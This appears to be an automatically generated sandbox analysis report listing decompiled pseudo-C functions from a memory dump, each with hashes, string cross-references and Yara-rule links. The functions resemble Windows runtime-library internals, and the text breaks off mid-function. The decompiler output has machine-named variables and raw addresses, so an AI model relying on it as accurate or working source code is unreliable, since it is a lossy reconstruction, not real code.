0x00000000

Strings

PATH, xrefs: 1E3D2642, 1E3D2691

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: PATH
API String ID: 0-1036084923
Opcode ID: 1bdcb8070d9471ccf7fbae13a7332380e65c8477ac2325fc0249dfabc85de32d
Instruction ID: ca3ba7ddd2bbc8decde1601b7282267ecc70d950a386f2030515d9f234ffeaec
Opcode Fuzzy Hash: 1bdcb8070d9471ccf7fbae13a7332380e65c8477ac2325fc0249dfabc85de32d
Instruction Fuzzy Hash: 87C1A0B6D00319DBDB14CF99D880AADB7B5FF48B20F85461AE801BB250E775A945CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 1E3AC962, Relevance: 1.6, APIs: 1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 42%

			E1E3AC962(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t19;
				intOrPtr _t22;
				void* _t26;
				void* _t27;
				void* _t32;
				intOrPtr _t34;
				void* _t35;
				void* _t37;
				intOrPtr* _t38;
				signed int _t39;

				_t41 = (_t39 & 0xfffffff8) - 0xc;
				_v8 =  *0x1e49d360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
				_t34 = __ecx;
				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
					_t26 = 0;
					E1E3BEEF0(0x1e4970a0);
					_t29 =  *((intOrPtr*)(_t34 + 0x18));
					if(E1E42F625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
						L9:
						E1E3BEB70(_t29, 0x1e4970a0);
						_t19 = _t26;
						L2:
						_pop(_t35);
						_pop(_t37);
						_pop(_t27);
						return E1E3EB640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
					}
					_t29 = _t34;
					_t26 = E1E42F1FC(_t34, _t32);
					if(_t26 < 0) {
						goto L9;
					}
					_t38 =  *0x1e4970c0; // 0x0
					while(_t38 != 0x1e4970c0) {
						_t22 =  *((intOrPtr*)(_t38 + 0x18));
						_t38 =  *_t38;
						_v12 = _t22;
						if(_t22 != 0) {
							_t29 = _t22;
							 *0x1e49b1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
							_v12();
						}
					}
					goto L9;
				}
				_t19 = 0;
				goto L2;
			}

0x1e3ac96a
0x1e3ac974
0x1e3ac988
0x1e3ac98a
0x1e417c9d
0x1e417c9f
0x1e417ca4
0x1e417cae
0x1e417cf0
0x1e417cf5
0x1e417cfa
0x1e3ac992
0x1e3ac996
0x1e3ac997
0x1e3ac998
0x1e3ac9a3
0x1e3ac9a3
0x1e417cb0
0x1e417cb7
0x1e417cbb
0x00000000
0x00000000
0x1e417cbd
0x1e417ce8
0x1e417cc5
0x1e417cc8
0x1e417cca
0x1e417cd0
0x1e417cd6
0x1e417cde
0x1e417ce4
0x1e417ce4
0x1e417cd0
0x00000000
0x1e417ce8
0x1e3ac990
0x00000000

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd3ab59a64d1062619f3f9fc80ba255f4fb479a57aedc68db1bb2ef1ae5a4f34
Instruction ID: d9b1183ea620359062717a7d11fe998d4f3a0d63a25899ab55e98cedf7a54231
Opcode Fuzzy Hash: cd3ab59a64d1062619f3f9fc80ba255f4fb479a57aedc68db1bb2ef1ae5a4f34
Instruction Fuzzy Hash: 4311AC312106969BCB14DF299C89A5BBBE6BB89210B400B2AE846A7650EF20FC50D7D1

Uniqueness

Uniqueness Score: -1.00%

Function 1E3A2D8A, Relevance: 1.4, Strings: 1, Instructions: 191
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E1E3A2D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0x1e495350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0x1e497bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E1E3E97C0();
				}
				if( *0x1e4979c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0x1e4979c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E1E3D1624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E1E3C7D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E1E43FE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E1E3E9520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E1E3DE18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								E1E3FDF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0x1e496901;
								_push(_t109);
								_v52 = _t98;
								if( *0x1e496901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E1E3E9980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E1E3E95D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E1E3C7D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E1E3C7D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E1E427016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E1E43FDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0x1e495350;
							if(_t109 != 0x1e495350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E1E43FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E1E435720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}

0x1e3a2d8a
0x1e3a2d8a
0x1e3a2d92
0x1e3a2d96
0x1e3a2d9e
0x1e3a2da0
0x1e3a2da3
0x1e3a2da5
0x1e3a2da8
0x1e3a2dab
0x1e3a2db2
0x1e3ff9aa
0x1e3ff9ab
0x1e3ff9ae
0x1e3ff9ae
0x1e3a2db8
0x1e3a2dc2
0x1e3ff9b9
0x1e3ff9be
0x1e3ff9bf
0x1e3ff9bf
0x1e3a2dcf
0x1e3ff9c9
0x1e3a2dd5
0x1e3a2dd5
0x1e3a2dd5
0x1e3a2dde
0x1e3a2de1
0x1e3a2e70
0x1e3a2e72
0x1e3a2e72
0x1e3a2de7
0x1e3a2deb
0x1e3a2e7c
0x1e3a2e83
0x1e3a2e85
0x1e3a2e8b
0x1e3a2e8d
0x1e3a2e92
0x1e3a2e92
0x1e3a2e85
0x1e3a2df1
0x1e3a2df7
0x1e3a2df9
0x1e3a2df9
0x1e3a2dfc
0x1e3a2dff
0x1e3a2e02
0x00000000
0x1e3a2e05
0x1e3a2e0c
0x1e3ff9d9
0x1e3a2e12
0x1e3a2e12
0x1e3a2e12
0x1e3a2e1a
0x1e3ff9e3
0x1e3ff9e9
0x1e3ff9f0
0x1e3ff9f6
0x1e3ff9f8
0x1e3ff9f8
0x1e3ff9f0
0x1e3a2e23
0x1e3ffa02
0x1e3ffa03
0x1e3ffa05
0x1e3ffa06
0x00000000
0x1e3a2e29
0x1e3a2e29
0x1e3a2e2e
0x1e3a2e34
0x1e3a2e3e
0x00000000
0x00000000
0x1e3a2e44
0x1e3a2e47
0x1e3a2e4d
0x00000000
0x00000000
0x1e3a2e4f
0x1e3a2e54
0x00000000
0x00000000
0x1e3a2e5a
0x1e3a2e5f
0x1e3a2e9a
0x1e3a2ea4
0x1e3a2ea5
0x1e3a2ea8
0x1e3a2eaf
0x1e3a2eb2
0x1e3a2eb5
0x1e3ffae9
0x1e3ffaeb
0x1e3ffaed
0x1e3ffaef
0x1e3ffaf7
0x1e3ffaf8
0x1e3ffafd
0x1e3ffaff
0x1e3ffb04
0x1e3ffb04
0x1e3ffaff
0x1e3a2ec0
0x1e3a2ec4
0x1e3a2ec6
0x1e3a2ec8
0x1e3ffb14
0x1e3ffb18
0x1e3ffb1e
0x1e3ffb21
0x1e3ffb21
0x1e3a2ece
0x1e3a2ece
0x1e3a2ece
0x1e3a2ed7
0x1e3a2e61
0x1e3a2e63
0x1e3ffa6b
0x1e3ffa71
0x1e3ffa76
0x1e3ffa78
0x1e3ffa8a
0x1e3ffa7a
0x1e3ffa83
0x1e3ffa83
0x1e3ffa8f
0x1e3ffa91
0x1e3ffa97
0x1e3ffa9d
0x1e3ffaa4
0x1e3ffaaa
0x1e3ffaaf
0x1e3ffab1
0x1e3ffac3
0x1e3ffab3
0x1e3ffabc
0x1e3ffabc
0x1e3ffac8
0x1e3ffacb
0x1e3ffadf
0x1e3ffadf
0x1e3ffacb
0x1e3ffaa4
0x1e3ffa91
0x1e3a2e6f
0x1e3a2e6f
0x1e3a2e5f
0x1e3ffa13
0x1e3ffa15
0x1e3ffa17
0x1e3ffa1f
0x1e3ffa21
0x1e3ffa22
0x1e3ffa25
0x1e3ffa28
0x1e3ffa2f
0x1e3ffa2f
0x1e3ffa2a
0x1e3ffa2a
0x1e3ffa2a
0x1e3ffa31
0x1e3ffa34
0x1e3ffa36
0x1e3ffa3c
0x1e3ffa3e
0x1e3ffa41
0x1e3ffa43
0x1e3ffa45
0x1e3ffa45
0x1e3ffa41
0x1e3ffa3c
0x1e3ffa4a
0x1e3ffa4f
0x1e3ffa51
0x1e3ffa53
0x1e3ffa56
0x1e3ffa5b
0x1e3ffa5e
0x00000000
0x1e3ffa5e
0x1e3a2e23

Strings

RTL: Re-Waiting, xrefs: 1E3FFA4A

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: RTL: Re-Waiting
API String ID: 0-316354757
Opcode ID: 37550333f551b4ae168182f4c0789f4aad0da37ca52443ea7eb139b31e626696
Instruction ID: 7d7d7224e884e6ce5ad7f96865e1dbee095bd55561811f6e305a3023a6d10700
Opcode Fuzzy Hash: 37550333f551b4ae168182f4c0789f4aad0da37ca52443ea7eb139b31e626696
Instruction Fuzzy Hash: BD612471A00695DBDB21CF68C894B6E77E6EF84B14F1407AAE951A72C1C734ADC0CBD2

Uniqueness

Uniqueness Score: -1.00%

Function 1E3A52A5, Relevance: 1.4, Strings: 1, Instructions: 161
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E1E3A52A5(char __ecx) {
				char _v20;
				char _v28;
				char _v29;
				void* _v32;
				void* _v36;
				void* _v37;
				void* _v38;
				void* _v40;
				void* _v46;
				void* _v64;
				void* __ebx;
				intOrPtr* _t49;
				signed int _t53;
				short _t85;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				intOrPtr _t101;
				intOrPtr* _t102;
				intOrPtr* _t104;
				signed int _t106;
				void* _t108;

				_t93 = __ecx;
				_t108 = (_t106 & 0xfffffff8) - 0x1c;
				_push(_t88);
				_v29 = __ecx;
				_t89 = _t88 | 0xffffffff;
				while(1) {
					E1E3BEEF0(0x1e4979a0);
					_t104 =  *0x1e498210; // 0x702c68
					if(_t104 == 0) {
						break;
					}
					asm("lock inc dword [esi]");
					 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
					E1E3BEB70(_t93, 0x1e4979a0);
					if( *((char*)(_t108 + 0xf)) != 0) {
						_t101 =  *0x7ffe02dc;
						__eflags =  *(_t104 + 0x14) & 0x00000001;
						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0x90028);
							_push(_t108 + 0x20);
							_push(0);
							_push(0);
							_push(0);
							_push( *((intOrPtr*)(_t104 + 4)));
							_t53 = E1E3E9890();
							__eflags = _t53;
							if(_t53 >= 0) {
								__eflags =  *(_t104 + 0x14) & 0x00000001;
								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
									E1E3BEEF0(0x1e4979a0);
									 *((intOrPtr*)(_t104 + 8)) = _t101;
									E1E3BEB70(0, 0x1e4979a0);
								}
								goto L3;
							}
							__eflags = _t53 - 0xc0000012;
							if(__eflags == 0) {
								L12:
								_t13 = _t104 + 0xc; // 0x702c75
								_t93 = _t13;
								 *((char*)(_t108 + 0x12)) = 0;
								__eflags = E1E3DF0BF(_t13,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								if(__eflags >= 0) {
									L15:
									_t102 = _v28;
									 *_t102 = 2;
									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
									E1E3BEEF0(0x1e4979a0);
									__eflags =  *0x1e498210 - _t104; // 0x702c68
									if(__eflags == 0) {
										__eflags =  *((char*)(_t108 + 0xe));
										_t95 =  *((intOrPtr*)(_t108 + 0x14));
										 *0x1e498210 = _t102;
										_t32 = _t102 + 0xc; // 0x0
										 *_t95 =  *_t32;
										_t33 = _t102 + 0x10; // 0x0
										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
										_t35 = _t102 + 4; // 0xffffffff
										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
										if(__eflags != 0) {
											_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
											E1E424888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
										}
										E1E3BEB70(_t95, 0x1e4979a0);
										asm("lock xadd [esi], eax");
										if(__eflags == 0) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E1E3E95D0();
											L1E3C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										asm("lock xadd [esi], ebx");
										__eflags = _t89 == 1;
										if(_t89 == 1) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E1E3E95D0();
											L1E3C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										_t49 = _t102;
										L4:
										return _t49;
									}
									E1E3BEB70(_t93, 0x1e4979a0);
									asm("lock xadd [esi], eax");
									if(__eflags == 0) {
										_push( *((intOrPtr*)(_t104 + 4)));
										E1E3E95D0();
										L1E3C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
										_t102 =  *((intOrPtr*)(_t108 + 0x10));
									}
									 *_t102 = 1;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										_t28 = _t102 + 4; // 0xffffffff
										_push( *_t28);
										E1E3E95D0();
										L1E3C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
									}
									continue;
								}
								_t93 =  &_v20;
								 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
								_t85 = 6;
								_v20 = _t85;
								_t87 = E1E3DF0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								__eflags = _t87;
								if(_t87 < 0) {
									goto L3;
								}
								 *((char*)(_t108 + 0xe)) = 1;
								goto L15;
							}
							__eflags = _t53 - 0xc000026e;
							if(__eflags != 0) {
								goto L3;
							}
							goto L12;
						}
						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
							goto L3;
						} else {
							goto L9;
						}
					}
					L3:
					_t49 = _t104;
					goto L4;
				}
				_t49 = 0;
				goto L4;
			}

0x1e3a52a5
0x1e3a52ad
0x1e3a52b0
0x1e3a52b3
0x1e3a52b7
0x1e3a52ba
0x1e3a52bf
0x1e3a52c4
0x1e3a52cc
0x00000000
0x00000000
0x1e3a52ce
0x1e3a52d9
0x1e3a52dd
0x1e3a52e7
0x1e3a52f7
0x1e3a52f9
0x1e3a52fd
0x1e400dcf
0x1e400dd5
0x1e400dd6
0x1e400dd7
0x1e400dd8
0x1e400dd9
0x1e400dde
0x1e400ddf
0x1e400de0
0x1e400de1
0x1e400de2
0x1e400de5
0x1e400dea
0x1e400dec
0x1e400f60
0x1e400f64
0x1e400f70
0x1e400f76
0x1e400f79
0x1e400f79
0x00000000
0x1e400f64
0x1e400df2
0x1e400df7
0x1e400e04
0x1e400e0d
0x1e400e0d
0x1e400e10
0x1e400e1a
0x1e400e1c
0x1e400e4c
0x1e400e52
0x1e400e61
0x1e400e67
0x1e400e6b
0x1e400e70
0x1e400e76
0x1e400ed7
0x1e400edc
0x1e400ee0
0x1e400ee6
0x1e400eea
0x1e400eed
0x1e400ef0
0x1e400ef3
0x1e400ef6
0x1e400ef9
0x1e400efe
0x1e400f01
0x1e400f01
0x1e400f0b
0x1e400f12
0x1e400f16
0x1e400f18
0x1e400f1b
0x1e400f2c
0x1e400f31
0x1e400f31
0x1e400f35
0x1e400f39
0x1e400f3a
0x1e400f3c
0x1e400f3f
0x1e400f50
0x1e400f55
0x1e400f55
0x1e400f59
0x1e3a52eb
0x1e3a52f1
0x1e3a52f1
0x1e400e7d
0x1e400e84
0x1e400e88
0x1e400e8a
0x1e400e8d
0x1e400e9e
0x1e400ea3
0x1e400ea3
0x1e400ea7
0x1e400eaf
0x1e400eb3
0x1e400eb9
0x1e400eb9
0x1e400ebc
0x1e400ecd
0x1e400ecd
0x00000000
0x1e400eb3
0x1e400e21
0x1e400e2b
0x1e400e2f
0x1e400e30
0x1e400e3a
0x1e400e3f
0x1e400e41
0x00000000
0x00000000
0x1e400e47
0x00000000
0x1e400e47
0x1e400df9
0x1e400dfe
0x00000000
0x00000000
0x00000000
0x1e400dfe
0x1e3a5303
0x1e3a5307
0x00000000
0x1e3a5309
0x00000000
0x1e3a5309
0x1e3a5307
0x1e3a52e9
0x1e3a52e9
0x00000000
0x1e3a52e9
0x1e3a530e
0x00000000

Strings

h,p, xrefs: 1E3A52C4, 1E400E70, 1E400EE0

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: h,p
API String ID: 0-3501283608
Opcode ID: 642cf9ee4fd23c70a6aef79df329b14b9d3a1b6d81b1afcd6ca884abc8de2147
Instruction ID: 5a995744909957b71e5bd407c6e23423e698771b878207fa0d92212666156f33
Opcode Fuzzy Hash: 642cf9ee4fd23c70a6aef79df329b14b9d3a1b6d81b1afcd6ca884abc8de2147
Instruction Fuzzy Hash: DB51BD75145382ABD311CF68C844B57BBA6FF88710F140F2AE99597A90E770F884C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 1E470EA5, Relevance: 1.4, Strings: 1, Instructions: 153
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E1E470EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E1E46FF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E1E471074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E1E3E9730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E1E46A80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E1E46A854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0x1e498b04 >> 0x14) + (_v44 -  *0x1e498b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E1E3C7D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E1E46138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E1E3C7D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E1E45FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0x1e498724 & 0x00000008) != 0) {
						E1E4652F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E1E4715B5(0x1e498ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}

0x1e470eb7
0x1e470eb9
0x1e470ec0
0x1e470ec2
0x1e470ecd
0x1e47105b
0x1e47105b
0x1e471061
0x1e471066
0x1e471066
0x1e47106b
0x1e471073
0x1e471073
0x1e470ed3
0x1e470ed6
0x1e470edc
0x1e470ee0
0x1e470ee7
0x1e470ef0
0x1e470ef5
0x1e470efa
0x1e470efc
0x1e470efd
0x1e470f03
0x1e470f04
0x1e470f06
0x1e470f07
0x1e470f09
0x1e470f0e
0x1e470f14
0x1e470f23
0x1e470f2d
0x1e470f34
0x1e470f34
0x1e470f14
0x1e470f52
0x00000000
0x00000000
0x1e470f58
0x1e470f73
0x1e470f74
0x1e470f79
0x1e470f7d
0x1e470f80
0x1e470f86
0x1e470fab
0x1e470fb5
0x1e470fc6
0x1e470fd1
0x1e470fe3
0x1e470fd3
0x1e470fdc
0x1e470fdc
0x1e470feb
0x1e471009
0x1e471009
0x1e471015
0x1e471027
0x1e471017
0x1e471020
0x1e471020
0x1e47102f
0x1e47103c
0x1e47103c
0x1e471048
0x1e471050
0x1e471050
0x1e471055
0x00000000
0x1e471055
0x1e470f88
0x1e470f9e
0x1e470fa2
0x1e470fa9
0x00000000
0x00000000
0x00000000
0x1e470fa9
0x00000000

Strings

`, xrefs: 1E470F16

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: a6871f9966b40d91b988ea79565b0eeb278d666e8a329df0d83ab7186fc0f5fd
Instruction ID: b20ca2f84411f00296388912183d4dd90659a5eeed032e63ce4cc62d023a75c5
Opcode Fuzzy Hash: a6871f9966b40d91b988ea79565b0eeb278d666e8a329df0d83ab7186fc0f5fd
Instruction Fuzzy Hash: 1B519A74A043819BD315CF29D980B5BB7E6EFC8704F000A2EF99697790D770E906CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 1E3DF0BF, Relevance: 1.4, Strings: 1, Instructions: 137
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E1E3DF0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E1E3C4120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E1E3E9830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L1E3C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E1E3E9990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E1E3E95D0();
							goto L11;
						} else {
							_t109 = L1E3C4620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
